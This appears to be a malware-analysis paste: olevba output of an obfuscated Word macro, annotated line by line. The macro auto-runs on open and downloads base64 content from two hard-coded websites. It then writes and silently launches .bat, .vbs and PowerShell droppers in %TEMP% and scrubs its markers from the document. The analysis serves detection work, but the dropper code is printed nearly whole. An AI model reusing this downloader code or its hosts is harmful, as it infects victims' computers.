dynamoo

Malicious Word macro

Jul 16th, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-HB- total_~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: total_~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: total_~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Empty stub with no visible caller; reads as filler to pad the module.
  15. Sub Dqwkdojqwiodqw_Open()
  16.      
  17. End Sub
  ' Empty stub with no visible caller; same filler pattern as Dqwkdojqwiodqw_Open.
  18. Sub Ejoqiwjdioqwjdqo_Open()
  19.      
  20. End Sub
  ' Auto-exec name (runs on open in Excel). All three auto-exec entries in this
  ' module funnel here, and from here via Djiqowjdwoiqjdqwo into Xjqwidjowqjdq.
  21. Sub Auto_Open()
  22.     Djiqowjdwoiqjdqwo
  23. End Sub
  ' Indirection hop: a dead string assignment, then the call into the main routine.
  24. Sub Djiqowjdwoiqjdqwo()
  25.     UQHDIQWHD = "1j2h eiuh1k2jeh21kjeh jk12g ehj12g"
  26.     Xjqwidjowqjdq
  27. End Sub
  ' Dead code: assigns a junk string and is never called in the visible modules.
  28. Sub Giqjwdhqwkjq()
  29.     DQUHWDIWQ = "eji21h ui21he21"
  30. End Sub
  31.  
  ' Word auto-exec entry point (runs when the document is opened); forwards to Auto_Open.
  32. Sub AutoOpen()
  33.     Auto_Open
  34. End Sub
  ' Excel workbook auto-exec entry point; junk assignment, then forwards to Auto_Open.
  35. Sub Workbook_Open()
  36.     NJQWBDJQKW = "j2hge h1hj1g2 hj21gje "
  37.     Auto_Open
  38. End Sub
  39.  
  ' Main dropper routine, reached from AutoOpen / Auto_Open / Workbook_Open.
  ' Stages visible in the code, in order:
  '   1. Build a drop directory from Environ("Temp") (Module2.Goabc) plus a random numeric base name (Ubqhwdhwqbd).
  '   2. HTTP GET a text blob from one of two hard-coded URLs (Module2.Linolium), falling back to the second host.
  '   3. Base64-decode it (Quqhwdbyas) and extract tagged sections with Port().
  '   4. Write .bat / .vbs / .ps1 scripts into the drop directory and launch the .bat hidden (Module3.HowEver -> Shell).
  '   5. Delete / recolour / blank the payload markers in the document body (Module3.India).
  ' There is no Option Explicit: the uppercase names are undeclared Variants, and many
  ' string literals are noise that is never read. No error handler is present anywhere in the routine.
  ' Host artefacts to look for: script files with an all-digit name and .bat/.vbs/.ps1 extensions
  ' under %TEMP%; network egress from the Office process to the two hosts named in STT1/STT2.
  40. Sub Xjqwidjowqjdq()
  41.  
  42.    
  43.     Dim fallout As Integer, silkroad As Integer, inclife As Integer, inredible As Integer
  44.     Dim retVal As Variant, gana As Integer, turkey As Integer, malay As Integer, SPAIN As String, BOLIVIA As String
  ' Chr(92) = "\" (path separator).
  45.     BOLIVIA = Chr(90 + 2)
  46.    
  47.    
  ' Random numeric base name shared by all dropped files (see Ubqhwdhwqbd).
  48.     ANGOLA = Ubqhwdhwqbd(15425) + ""
  ' Chr(84) = "T", so SPAIN is "Temp" - the environment variable name read below.
  49.     SPAIN = Chr(84) & "em" + "p"
  50.     QHDQUWH = ANGOLA
  51.     FL2 = QHDQUWH
  ' PH2 = Environ("Temp") & "\" : the drop directory.
  52.     PH2 = Module2.Goabc(SPAIN) + BOLIVIA
  53.    
  54.     silkroad = 9
  55.     jwnqdw = -1
  56.    
  ' 1 + 1 + 113 + Sgn(-1) = 114; the first BOSNIA value and silkroad are dead.
  57.     BOSNIA = 12312312
  58.     BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
  59.     BALAGAN = BOSNIA
  60.    
  61.  
  62.     TROYA = "bajh21ejk1h21hejk12h ejk21ht"
  63.     JWIDJIAAA = ""
  64.     HUYFEA = "gdhjqwg hqjwgdhjqwg hjqwgdhjqwg"
  65.     QIWJDABB = "b"
  ' HUYFEA = "bat".
  66.     HUYFEA = QIWJDABB + "a" + "t"
  67.     IUQJWD = "bjgqhdhjg21jhgdhj1g jh1eg hj21ge j2h"
  ' Chr(115) = "s", Chr(49) = "1": PSFL = <base>.ps1
  68.     PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
  69.    
  ' Sin(20 rad) is positive, so 1 - 300*Sin(20) is negative and gana = -1.
  70.     gana = NUqwdqwbdsad(1 - 300 * Sin(20))
  ' Chr(114 + 2 - 1) = Chr(115) = "s".
  71.     SSS = Chr(BALAGAN + 2 + gana)
  ' Chr(46) = "." : VBFL = <base>.vbs
  72.     VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
  ' Sgn(Fix(-22.043)) = -1, so the Chr() argument is -1+31-10+25-1+2 = 46 = "." : BAFL = <base>.bat
  73.     BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
  74.    
  ' Tag names used later by Module3.India to locate markers in the document text:
  ' INTG = "object"; KIWD = Chr(111) & "dule" = "odule"; AFTG = Chr(109) & KIWD = "module".
  75.     INTG = "" & "o" & "bject"
  76.     KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "d" + "" + "ul" + "e"
  77.     AFTG = Chr(109) & KIWD
  78.    
  ' SXE = ".exe"; GNG = Chr(46) & "jpg" = ".jpg".
  79.     SXEE = Chr(46)
  80.     SXAA = Chr(101)
  81.     SXE = SXEE & SXAA & "" & "xe"
  82.     GNG = Chr(2 ^ 2 + 42) + "jpg"
  83.    
  84.    
  85.    
  ' HUQD = Chr(47) = "/"; ATTH = "http://"; BQHJDQ is an image-host path used for STAR1/STAR2 below.
  86.     HUQD = Chr(30 + 16 + 1)
  87.     ATTH = "ht" & "t" & "" & "p" & ":" & "/" & Chr(47)
  88.     BQHJDQ = "sav" + "epic" & Chr(46) & "su" + HUQD
  89.      
  ' Full paths of the three dropped scripts (the first BAPTH literal is dead).
  90.     PSPTH = PH2 + PSFL
  91.     VBPTH = PH2 + VBFL
  92.     BAPTH = "qhwdqwui 21u eg1ygueyg21 "
  93.     ABPTH = PH2 + BAFL
  94.     BAPTH = ABPTH
  95.     JHQKWDQAASS = BQHJDQ
  96.    
  ' DRT..EFT are the VBA file numbers used with Open/Print #/Close below.
  97.     Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
  98.    
  99.     DRT = 315
  100.     BFT = 316
  101.     CFT = 317
  102.     DFT = 318
  103.     EFT = 319
  104.     Dim NUWDHUQHUQWDH As String
  ' "USERPROFILE" - read below to guess the Windows generation.
  105.     NUWDHUQHUQWDH = "USE" & "RPROFILE"
  106.     Dim PBIn As String, asdwq As String, MIWDWQ As String
  107.    
  108.    
  109.    
  ' Download locations. CDDD is the (base64) payload text, LNSS a second text file;
  ' STT1/STT2 are the two hard-coded hosts, both on the same relative path.
  110.     TSTS = "." + "t" + "xt"
  111.     CDDD = "78672738612836" + TSTS
  112.     LNSS = "papa" + TSTS
  113.     STT1 = "thereis.staging.nodeproduction.com/w" + "p-con" + "tent/uplo" + "ads/"
  114.     STT2 = "www.buildingwalls.co.za/w" + "p-con" + "tent/t" + "hemes/corporate-10/"
  115.  
  116.  
  ' Stage 2: HTTP GET from the first host (Module2.Linolium returns the response text).
  117.     PBIn = ATTH + STT1 + CDDD
  118.     CONT = Module2.Linolium(PBIn)
  119.      
  ' Rasdas = last character of the response.
  120.     asdwq = Rasdas(CONT)
  121.    
  ' Fallback: if the response does not end in base64 padding ("="), fetch from the second host.
  ' NOTE(review): on the first-host path only that single last character (asdwq) reaches the
  ' decoder below, whereas the fallback path passes the whole response - looks like an author bug; verify in a sandbox.
  122.     HQUWDAAA = "0"
  123.     If (asdwq <> "=") Then
  124.         PBIn = ATTH + STT2 + CDDD
  125.         CONT = Module2.Linolium(PBIn)
  126.         asdwq = CONT
  127.         HQUWDAAA = "1"
  128.     End If
  129.    
  ' Stage 3: base64-decode via MSXML2.DOMDocument.
  130.     CONT = Quqhwdbyas(asdwq)
  131.      
  132.     Dim ahuywdgqy As String
  133.      
  ' Pull the script fragments out of the decoded blob by tag name (<text10>…</text10> etc.).
  134.     TVT10 = Port(CONT, "t" + "ext10")
  135.     TVT20 = Port(CONT, "text20")
  136.     TVT21 = Port(CONT, "text21")
  137.     TVT30 = Port(CONT, "text30")
  138.     TVT31 = Port(CONT, "text31")
  139.     XPT1 = Port(CONT, "stext1")
  140.     XPT2 = Port(CONT, "stext2")
  141.     XPT3 = Port(CONT, "stext3")
  142.    
  143.    
  ' OS check: does %USERPROFILE% contain "sers\" (i.e. a C:\Users\ profile, Vista and later)?
  144.     WVR = Module2.Goabc(NUWDHUQHUQWDH)
  145.     hufehu1 = InStr(WVR, "sers\")
  146.    
  147.     Dim hudhw As Integer
  148.     Dim ghdAdd(1 To 3)
  149.     ghdAdd(1) = "1"
  150.     ghdAdd(2) = "0"
  151.     ghdAdd(3) = "0"
  152.    
  153.     If (hufehu1 <> 0) Then
  154.         ghdAdd(1) = "2"
  155.     Else
  156.         ghdAdd(2) = "3"
  157.     End If
  158.  
  159.  
  ' Join gives "2 0 0" or "1 3 0"; Val skips blanks, so hudhw is 200 (Vista+) or 130 (older profile layout).
  160.     JHWQUD = Join(ghdAdd)
  161.     hudhw = Val(JHWQUD)
  162.    
  ' ~1 s busy-wait (Timer/DoEvents loop).
  163.     Module2.WaitFor (1)
  164.    
  ' Second download (LNSS) from whichever host succeeded above; its text is embedded in the .vbs/.ps1 below.
  165.     MIWDWQ = ATTH + STT1 + LNSS
  166.     If (HQUWDAAA = "1") Then
  167.         MIWDWQ = ATTH + STT2 + LNSS
  168.     End If
  169.    
  170.     SEXX = Module2.Linolium(MIWDWQ)
  171.    
  ' STAR1/STAR2 are http:// URLs on the image host; FF = "8" & ".exe".
  172.     PSTB = PBIn + "123123123"
  173.     MSTAR1 = JHQKWDQAASS + "5751812" + GNG
  174.     MSTAR2 = JHQKWDQAASS + "5757956" + GNG
  175.     STAR1 = ATTH + MSTAR1
  176.     STAR2 = ATTH + MSTAR2
  177.     FFQ = "8"
  178.     FF = FFQ + SXE
  179.    
  ' Stage 4a (older Windows branch): write a .bat built from XPT1/XPT2 and a .vbs built from XPT3,
  ' then run the .bat hidden through Module3.HowEver (Shell).
  180.      If (hudhw = 130) Then
  181.      Open BAPTH For Output As #DRT
  182.      Print #DRT, XPT1
  183.      Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
  184.      Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
  185.      Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
  186.      Print #DRT, XPT2
  187.      Close #DRT
  188.      
  189.      Module2.WaitFor (1)
  190.      
  191.      Open VBPTH For Output As #BFT
  192.      Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
  193.      Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
  194.      Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
  195.      Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
  196.      Print #BFT, XPT3
  197.      Close #BFT
  198.      
  ' NOTE(review): BDDT is not declared in any visible module (elsewhere the call is Module2.WaitFor).
  ' With no error handler, an unset Variant here would raise "Object required" before the Shell
  ' call, so whether this branch ever executes the .bat is uncertain.
  199.      BDDT.WaitFor (1)
  200.      NTH1 = Module3.HowEver(retVal, BAPTH)
  201.      
  202.      End If
  203.      
  204.      
  ' HUDQG closes a single-quoted PowerShell string literal in the .ps1 written below.
  205.      HUDQG = "';"
  206.      
  207.      
  208.      
  ' Stage 4b (Vista+ branch): write a .ps1 (TVT10), a .vbs (TVT30/TVT31) and a .bat (TVT20/TVT21),
  ' then run the .bat hidden through Module3.HowEver (Shell). The .bat/.vbs/.ps1 receive the drop
  ' directory, base name and "8" as variables so they can locate each other and the final binary.
  209.       If (hudhw = 200) Then
  210.        
  211.      ZPQSKD = FL2
  212.      Open PSPTH For Output As #CFT
  213.      Print #CFT, "$nqjkwdnq = 'qiwdqwhd';"
  214.      Print #CFT, "$ndqbwdwqs = 'jqwdnjkqwhd';"
  215.      Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
  216.      Print #CFT, "$ggtt = '" + SEXX + "';"
  217.      Print #CFT, "$pths = '" + PH2 + HUDQG
  218.      
  219.      Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
  220.      Print #CFT, "$nnm = '" + FFQ + "';"
  221.      Print #CFT, TVT10
  222.      Close #CFT
  223.      
  224.      Open VBPTH For Output As #DFT
  225.      Print #DFT, TVT30
  226.      Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
  227.      Print #DFT, TVT31
  228.      Close #DFT
  229.    
  ' Chr(30 + 30 + 4) = Chr(64) = "@", i.e. "@echo off".
  230.      Open BAPTH For Output As #EFT
  231.      Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
  232.      Print #EFT, TVT20
  233.      Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
  234.      Print #EFT, ":nqudiiqhdjkashd"
  235.      Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
  236.      Print #EFT, ":nqjdkbjkbdhjqwb"
  237.      Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
  238.      Print #EFT, TVT21
  239.      Close #EFT
  240.      Module2.WaitFor (1)
  241.      
  242.      NTH2 = Module3.HowEver(retVal, BAPTH)
  243.      
  244.      End If
  245.      
  ' Stage 5: clean up the document body. JUW = "/", AKK = "<".
  ' c=1 deletes the text between <object> and </object>, c=2 recolours the <module>…</module>
  ' text black, c=3 is meant to blank the tags themselves (see the caveat in Module3.India).
  246.     JUW = Chr(47)
  247.     AKK = Chr(60)
  248.     ZKK = ">"
  249.     NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
  250.     NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
  251.     NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
  252.     NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
  253.     NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
  254.     NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
  255.    
  256. End Sub
  257.  
  258.  
  ' Thin wrapper around Sgn(); used only to feed +/-1 into obfuscated Chr() arithmetic.
  ' The Integer parameter truncates fractional arguments before the sign is taken.
  259. Public Function NUqwdqwbdsad(a As Integer)
  260. NUqwdqwbdsad = Sgn(a)
  261. End Function
  262.  
  ' Returns a pseudo-random integer in [10000, 10000 + a) as a string; this becomes the
  ' base name of the dropped files. No Randomize call is visible in the modules.
  263. Public Function Ubqhwdhwqbd(a As Integer)
  264. Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
  265. End Function
  266.  
  267.  
  ' Base64-decodes strData using an MSXML2.DOMDocument element with DataType "bin.base64";
  ' nodeTypedValue yields the decoded bytes, which are returned through a String.
  268. Public Function Quqhwdbyas(ByVal strData As String) As String
  269.     Dim objXML As Object
  270.     Dim objNode As Object
  271.     Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
  ' Log10(100) = 2, Sgn(1 - 2) = -1, Chr(78 - 1) = "M": the ProgID is "MSXML2.DOMDocument".
  272.     nudqwd = Log10(100)
  273.     asduiwhqdqiw = NUqwdqwbdsad(1 - nudqwd)
  274.     QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
  275.     Set objXML = CreateObject(QHDHUQW)
  276.     Set objNode = objXML.createElement("b6" + "4")
  277.     objNode.DataType = "bin.b" + Chr(97) + "se" + "64" & ""
  278.     objNode.Text = strData
  279.     WUDHA = objNode.nodeTypedValue
  280.     Quqhwdbyas = WUDHA
  281.     Set objNode = Nothing
  282.     Set objXML = Nothing
  283. End Function
  284.  
  ' Returns the text of a between "<b>" and "</b>". UQWD = Chr(60) = "<", NDUW = Chr(62) = ">".
  ' The "+ 8" hard-codes an 8-character opening tag, which matches every tag name passed by the
  ' caller (text10, stext1, ...). There is no not-found handling: an InStr of 0 would give a
  ' negative length to Mid$ and raise a runtime error.
  285. Public Function Port(a, b As String)
  286. Dim krd, tent As Integer
  287. UQWD = "" & Chr(58 + 2)
  288. NDUW = "" & Chr(70 - 8)
  289. krd = InStr(1, a, UQWD + b + NDUW) + 8
  290. tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
  291. KLMN = Mid$(a, krd, tent)
  292. HUQHWDA = KLMN
  293. Port = HUQHWDA
  294. End Function
  295.  
  ' Last character of a; the caller compares it with "=" as a crude base64-padding check.
  296. Private Static Function Rasdas(a As String)
  297. Rasdas = Right(a, 1)
  298. End Function
  299.  
  300.  
  ' Base-10 logarithm via Log(x) / Log(10); the string assignment is dead noise.
  301. Private Static Function Log10(x)
  302. SWOPJDQIOW = "jqhw gdhjg12hjgd21g21d"
  303. Log10 = Log(x) / Log(10#)
  304. End Function
  305.  
  306.  
  307.  
  308.  
  309.  
  310.  
  311.  
  312.  
  313.  
  314.  
  315.  
  316.  
  317.  
  318. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  319. ANALYSIS:
  320. +------------+----------------+-----------------------------------------+
  321. | Type       | Keyword        | Description                             |
  322. +------------+----------------+-----------------------------------------+
  323. | AutoExec   | AutoOpen       | Runs when the Word document is opened   |
  324. | AutoExec   | Auto_Open      | Runs when the Excel Workbook is opened  |
  325. | AutoExec   | Workbook_Open  | Runs when the Excel Workbook is opened  |
  326. | Suspicious | Open           | May open a file                         |
  327. | Suspicious | Chr            | May attempt to obfuscate specific       |
  328. |            |                | strings                                 |
  329. | Suspicious | CreateObject   | May create an OLE object                |
  330. | Suspicious | Output         | May write to a file (if combined with   |
  331. |            |                | Open)                                   |
  332. | Suspicious | Print #        | May write to a file (if combined with   |
  333. |            |                | Open)                                   |
  334. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  335. |            |                | be used to obfuscate strings (option    |
  336. |            |                | --decode to see all)                    |
  337. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  338. |            |                | may be used to obfuscate strings        |
  339. |            |                | (option --decode to see all)            |
  340. +------------+----------------+-----------------------------------------+
  341. -------------------------------------------------------------------------------
  342. VBA MACRO Module1.bas
  343. in file: total_~1.doc - OLE stream: u'Macros/VBA/Module1'
  344. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Returns the responseText of an XMLHTTP-style object (the request created in Module2.Linolium).
  ' Splitting this one property read into its own module is part of the obfuscation.
  345. Public Function Xjdkhjfwefw(a As Object)
  346. XjdkhjfwefwSAD = "jh2ekjg12 jh12"
  347. Xjdkhjfwefw = a.responsetext
  348. End Function
  349.  
  350. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  351. ANALYSIS:
  352. No suspicious keyword or IOC found.
  353. -------------------------------------------------------------------------------
  354. VBA MACRO Module2.bas
  355. in file: total_~1.doc - OLE stream: u'Macros/VBA/Module2'
  356. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  357.  
  ' Environ() wrapper: callers pass "Temp" and "USERPROFILE". The three identical
  ' assignments are dead noise.
  358. Public Function Goabc(sps As String)
  359. BQHGDWJQW = "hqjwkhdjk12h 1gh" + "12jebmn21b enm12"
  360. BQHGDWJQW = "hqjwkhdjk12h 1gh" + "12jebmn21b enm12"
  361. BQHGDWJQW = "hqjwkhdjk12h 1gh" + "12jebmn21b enm12"
  362. Goabc = Environ(sps)
  363. End Function
  ' Synchronous HTTP GET of the URL in nbqjbdjqw; returns the response body as text.
  ' The ProgID is assembled from Chr() arithmetic: 34 Mod 7 = 6, 4 / 2^2 = 1, 6 + 1 + 77 = 84 = "T",
  ' Chr(84) = "T", Chr(80) = "P", giving "MSXML2.ServerXMLHTTP". Send() is called with the
  ' never-assigned AHUDWQI, i.e. an empty request body. No status check and no error handling.
  364. Public Function Linolium(nbqjbdjqw As String)
  365. Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
  366. Dim ashdUHhda As String
  367. ashdUHhda = nbqjbdjqw
  368. BQDHJQWDGWQJGS = "MSXML2.ServerXMLH" & Chr(34 Mod 7 + 4 / 2 ^ 2 + 77) & Chr(84) & Chr(80)
  369. 'MsgBox (BQDHJQWDGWQJGS)
  370. Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
  371. Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
  372. Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
  373. Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
  374. End Function
  ' Busy-waits roughly NumOfSeconds using Timer (seconds since midnight) and DoEvents;
  ' used between writing the dropped files and launching them.
  375. Sub WaitFor(NumOfSeconds As Long)
  376. Dim SngSec As Long
  377. SngSec = Timer + NumOfSeconds
  378. Do While Timer < SngSec
  379. DoEvents
  380. Loop
  381. End Sub
  382.  
  383.  
  384.  
  385.  
  386.  
  387.  
  388.  
  389.  
  390.  
  391.  
  392.  
  393.  
  394.  
  395.  
  396.  
  397.  
  398. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  399. ANALYSIS:
  400. +------------+--------------+-----------------------------------------+
  401. | Type       | Keyword      | Description                             |
  402. +------------+--------------+-----------------------------------------+
  403. | Suspicious | Open         | May open a file                         |
  404. | Suspicious | Chr          | May attempt to obfuscate specific       |
  405. |            |              | strings                                 |
  406. | Suspicious | CreateObject | May create an OLE object                |
  407. | Suspicious | Environ      | May read system environment variables   |
  408. +------------+--------------+-----------------------------------------+
  409. -------------------------------------------------------------------------------
  410. VBA MACRO Module3.bas
  411. in file: total_~1.doc - OLE stream: u'Macros/VBA/Module3'
  412. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  413.  
  414.  
  ' Document-body cleanup after the payload has been dropped. Finds dnuwhd, then b, in
  ' ActiveDocument and forms the range between them; c selects the action:
  '   1 - delete that range (the caller passes <object> / </object>),
  '   2 - set its font colour to black (<module> / </module>),
  '   3 - find-and-replace-all with QHUDW = Chr(33 + Sgn(-422)) = Chr(32), a space.
  ' NOTE(review): in the c=3 branch .Text is set to `a`, which is not a parameter or a declared
  ' variable here, so the replace appears to search for an empty string; whether the tag text
  ' is actually blanked should be confirmed in a sandbox. Return value is never assigned.
  415. Public Function India(dnuwhd As String, b As String, c As Integer)
  416. Dim selectedText As String
  417. Dim ssjidoqwhduqhwidqwudihq As Range, lesleslesqjhdjqkwhdwq As Range
  418. Set ssjidoqwhduqhwidqwudihq = ActiveDocument.Range
  419. RHQHDQWUHDQKW = "h 1j2he kh12jgh12 feg21fgeh12fjy"
  420. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  421. With ssjidoqwhduqhwidqwudihq.Find
  422. 'RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  423. 'RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  ' First search: locate dnuwhd and collapse to its end.
  424. .Text = dnuwhd
  425. .MatchWholeWord = True
  426. ssjidoqwhduqhwidqwudihq.Find.Execute
  427. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseEnd
  428. Dim wdwq As String
  429. Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
  430. Dim wdsadwq As String
  431. lesleslesqjhdjqkwhdwq.Start = ssjidoqwhduqhwidqwudihq.End
  ' Second search: locate b; the range between the two hits is the payload text.
  432. .Text = b
  433. .MatchWholeWord = True
  434. .Execute
  435. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  436. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  437. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseStart
  438. lesleslesqjhdjqkwhdwq.End = ssjidoqwhduqhwidqwudihq.Start
  439.  
  440. If (c = 1) Then
  441.     selectedText = lesleslesqjhdjqkwhdwq.Delete
  442. End If
  443. If (c = 2) Then
  444.     lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
  445. End If
  446.  
  447. Dim hduwaa As Integer
  448. hduwaa = 1 - 423
  449.  
  ' Sgn(-422) = -1, so QHUDW = Chr(32) (space).
  450. QHUDW = Chr(33 + Sgn(hduwaa))
  451.  
  452. If (c = 3) Then
  453.     With ssjidoqwhduqhwidqwudihq.Find
  454.     .Text = a
  455.     .Replacement.Text = QHUDW
  456.     'RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  457.    'RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  458.    'RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  459.    'RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  460.    .Wrap = wdFindContinue
  461.     .Execute Replace:=wdReplaceAll
  462.     End With
  463. End If
  464.  
  465. End With
  466. End Function
  467.  
  ' Launches the command line in b with Shell(); the window-style argument 0 runs it hidden.
  ' Returns Shell's task id (also written into a, a Variant passed by reference). The caller
  ' passes the path of the dropped .bat file. The string assignment is dead noise.
  468. Public Function HowEver(a As Variant, b)
  469. CJQIWDJQWD = "12jekh1 hj1k2 ehj12k"
  470. a = Shell(b, 0)
  471. HowEver = a
  472. End Function
  473.  
  474.  
  475.  
  476.  
  477.  
  478.  
  479.  
  480.  
  481.  
  482.  
  483.  
  484.  
  485.  
  486.  
  487. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  488. ANALYSIS:
  489. +------------+---------+-----------------------------------------+
  490. | Type       | Keyword | Description                             |
  491. +------------+---------+-----------------------------------------+
  492. | Suspicious | Chr     | May attempt to obfuscate specific       |
  493. |            |         | strings                                 |
  494. | Suspicious | Shell   | May run an executable file or a system  |
  495. |            |         | command                                 |
  496. +------------+---------+-----------------------------------------+